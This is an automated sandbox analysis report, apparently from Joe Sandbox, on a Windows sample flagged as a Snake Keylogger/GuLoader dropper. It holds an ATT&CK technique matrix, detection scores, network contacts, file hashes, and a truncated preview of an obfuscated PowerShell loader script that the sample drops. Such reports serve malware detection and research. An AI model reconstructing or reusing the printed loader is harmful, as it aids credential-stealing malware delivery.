      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\TVPfW4WUdj.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 311 Process Injection | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 311 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| TVPfW4WUdj.exe | 71% | Virustotal | |
| TVPfW4WUdj.exe | 55% | ReversingLabs | Win32.Spyware.Snakekeylogger |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne\TVPfW4WUdj.exe | 55% | ReversingLabs | Win32.Spyware.Snakekeylogger |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://crl.microi | 0% | Avira URL Cloud | safe |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 216.58.206.46 | true | false | | high |
| drive.usercontent.google.com | 172.217.16.193 | true | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://drive.usercontent.google.com/) | msiexec.exe | false | | high |
| http://nuget.org/NuGet.exe | powershell.exe | false | | high |
| https://aka.ms/winsvr-2022-pshelp | powershell.exe | false | | high |
| https://drive.google.com/; | msiexec.exe | false | | high |
| http://pesterbdd.com/images/Pester.png | powershell.exe | false | | high |
| https://translate.google.com/translate_a/element.js | msiexec.exe | false | | high |
| http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe | false | | high |
| http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | | high |
| http://crl.microH | powershell.exe | false | | high |
| https://drive.google.com/3 | msiexec.exe | false | | high |
| https://contoso.com/License | powershell.exe | false | | high |
| https://contoso.com/Icon | powershell.exe | false | | high |
| https://drive.usercontent.google.com/ | msiexec.exe | false | | high |
| https://drive.google.com/K | msiexec.exe | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | TVPfW4WUdj.exe, TVPfW4WUdj.exe.2.dr | false | | high |
| https://github.com/Pester/Pester | powershell.exe | false | | high |
| https://www.google.com | msiexec.exe | false | | high |
| http://crl.microi | powershell.exe | false | Avira URL Cloud: safe | unknown |
| https://aka.ms/pscore6lB | powershell.exe | false | | high |
| https://drive.google.com/ | msiexec.exe | false | | high |
| https://drive.google.com/S | msiexec.exe | false | | high |
| http://schemas.xmlsoap.org/wsdl/ | powershell.exe | false | | high |
| https://contoso.com/ | powershell.exe | false | | high |
| https://nuget.org/nuget.exe | powershell.exe | false | | high |
| https://apis.google.com | msiexec.exe | false | | high |
| https://drive.usercontent.google.com/0 | msiexec.exe | false | | high |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1588326
                                                              Start date and time:2025-01-11 00:00:14 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 39s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:11
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:TVPfW4WUdj.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:efef6cea36d9dd6e74cdf5adb9108ab1d0d3429de4d66898595f6c954e95c377.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 94%
                                                              • Number of executed functions: 94
                                                              • Number of non-executed functions: 24
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 5268 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:01:15 | API Interceptor | 38x Sleep call for process: powershell.exe modified
18:01:51 | API Interceptor | 36x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | WGi85dsMNp.exe | malicious | GuLoader | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | WtZl31OLfA.exe | malicious | Remcos, GuLoader | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | czHx16QwGQ.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | Setup.exe | malicious | Unknown | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | rXKfKM0T49.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
37f463bf4616ecd445d4a1937da06e19 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 172.217.16.193, 216.58.206.46
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):53158
                                                              Entropy (8bit):5.062687652912555
                                                              Encrypted:false
                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:GTA audio index data (SDT)
                                                              Category:dropped
                                                              Size (bytes):337232
                                                              Entropy (8bit):7.684331375702508
                                                              Encrypted:false
                                                              SSDEEP:6144:ZqR6Gd3ZDm5/I/o5LxucwhvjJxbPD5BBugQvNIUf7t9jExf/hRu:oR6Gjy5HahLJfBUBWUf70pzu
                                                              MD5:1639E2A4EBDF458FF751E71BAB70B2E9
                                                              SHA1:061B4478665E3B7123E9E71F52D1C842D4B3C90F
                                                              SHA-256:690927A3F3DE1E055D99DC28F3A178C8A0FC256C9BED04E7D0EAC456EA647B90
                                                              SHA-512:D5F327DFBC443A4B1F13B4EF3D8E77EACC09D24F95E5A11602295CFD98261E07D9AC2BB50F5F262F4405629074F2A221CDBBF88661F0B79BC07C65E237E3CE74
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):489410
                                                              Entropy (8bit):1.2436305558399738
                                                              Encrypted:false
                                                              SSDEEP:1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
                                                              MD5:03ADD5EC69F2D821F4BDDF502603364B
                                                              SHA1:CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
                                                              SHA-256:A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
                                                              SHA-512:4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
                                                              Malicious:false
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:Unicode text, UTF-8 text, with very long lines (4415), with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):69917
                                                              Entropy (8bit):5.1934732121055625
                                                              Encrypted:false
                                                              SSDEEP:1536:cnbuw/Q0vaewWSXJR+0dXUKRTTrh3f42AyOPh9Y7xe:E/CrWSZI0uKRTJRAyOP/gk
                                                              MD5:9B996ACD991E5AD14B711D89757782C8
                                                              SHA1:C2B37AD59CA09AFBAB44989EA3E7F4A2FE757D65
                                                              SHA-256:46D206B22BBA908C9F1C7B7D973162220B16121704F8641B204859B48DA7BFF3
                                                              SHA-512:36E0D204763195517C7E409CC1612AD303114AAC60334F7D8C4BA0DB42727997CAD4B52DE00959430EC6AA9103BAE0E037736D9EB0BFF03853A34197CA127A8A
                                                              Malicious:true
                                                              Preview:$Fro=$Sorb;........$Begrendes = @'.Afprvni.Proje,s$LiebhavUg rlingn materidHnseneseDerud crEmancipaAfsl tnrAvokadom Sekrets opastomManometuEksekutsActuatikobloquiechontawlPiquett=Haemate$AnemobiSBispehui Chowchk FysiurkDdsscene rummaarIm etrahFlysim e Dolourdbadul ess ndendrAnstrgsa OlenelaFatti,hdGeorgiae Husbant Stvsug6Afgifts4 Maesto; Utilit.Ekstraof Milja uKingsbenYderpuncNavnenetHel,cini Korsr.o Postekn Biblio SmeekskJSkovmr u SandsylUn.roptet ioaldtfernissrPangamyePerid nr ProvisnParalleeForgive U serfl(Obligem$ BlindeT M rtenaKorrumpitredoblnLeannestFors niuO ientarDialyseeKachere1Planobl,Dustcoa$ ElskovSAgaterncRijsttarGastropu Crapehf TittisfOpskruei PsychieLnnerrasLowbytet amgrss7Fleksiv)Fioldis Cross,u{Raphid .Theosop.Sikkerh$RetmaskFEu uchroDaastemr lectrou.nhrensr Trogl oAfspndilPatronaiDelimitgReconsueLitogral Tidnd sklinkene D,hybr Monorga(MormoniGFunktioe HldninsAparthriPerisphm elvflgsPhonogre OpsamlnIndfoersInstruk fordli'Sicc tidCountere NonepicBillhoolParametaBin,
                                                              Process:C:\Users\user\Desktop\TVPfW4WUdj.exe
                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
                                                              Category:dropped
                                                              Size (bytes):359870
                                                              Entropy (8bit):1.2579154698125035
                                                              Encrypted:false
                                                              SSDEEP:768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
                                                              MD5:8A6A8A75FE9A08909B09C7242C1B0C73
                                                              SHA1:0EC96FBA81824408C7838638BDA73C6C1D055CFA
                                                              SHA-256:1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
                                                              SHA-512:4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
                                                              Malicious:false
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):859801
                                                              Entropy (8bit):7.712622921398649
                                                              Encrypted:false
                                                              SSDEEP:12288:wTJidkhIqHdLlCJqFwvkldLMWAqDUGwX1QWu3FwKmrMhiNAgZY8i3oXRKQCzcdYz:wTkQIwLPExWnUGtWWFwK/sfZV+ER/y
                                                              MD5:5DEC892FCAF6F21AC6780C69F631F82C
                                                              SHA1:851AE1F87751CBED45A523FC340771F998E62DB1
                                                              SHA-256:EFEF6CEA36D9DD6E74CDF5ADB9108AB1D0D3429DE4D66898595F6C954E95C377
                                                              SHA-512:634F1686A1C25A6855070E0C7A8A8D7C7A0DA8241A4D7EBED6E8E44D51C8D21911482279623FC50161077BEBA9685CDDD862A26F4FC407E06A70D80FC2CA8F8A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 55%
